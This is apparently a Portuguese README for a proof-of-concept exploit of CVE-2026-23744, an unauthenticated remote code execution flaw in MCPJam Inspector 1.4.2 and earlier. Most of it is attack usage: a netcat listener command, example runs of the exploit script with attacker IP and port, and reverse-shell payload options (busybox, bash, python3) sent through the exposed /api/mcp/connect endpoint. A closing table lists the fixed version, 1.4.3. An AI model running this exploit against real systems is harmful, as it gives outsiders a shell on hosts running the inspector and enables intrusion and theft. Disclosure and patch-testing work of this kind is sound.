
CVE-2026-23744 — Prova de conceito de exploit para uma vulnerabilidade de Execução Remota de Código não autenticada no MCPJam Inspector <= 1.4.2.
O MCPJam Inspector <= 1.4.2 vincula-se a 0.0.0.0 por padrão e expõe /api/mcp/connect sem nenhuma autenticação. O endpoint aceita um objeto serverConfig que inicia um processo diretamente no host — passar um payload de reverse shell dá RCE imediato sem necessidade de credenciais.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| Flag | Descrição | Padrão |
|---|---|---|
-u | URL do alvo | obrigatório |
-i | Seu IP do listener (LHOST) | obrigatório |
-p | Sua porta do listener (LPORT) | obrigatório |
-m | Método do payload: busybox, bash, python3 | busybox |
Passo 1 — Inicie seu listener:
nc -lvnp 4444
Passo 2 — Execute o exploit:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
Se busybox não funcionar no alvo, tente os outros métodos:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| Software | Vulnerável | Corrigida |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |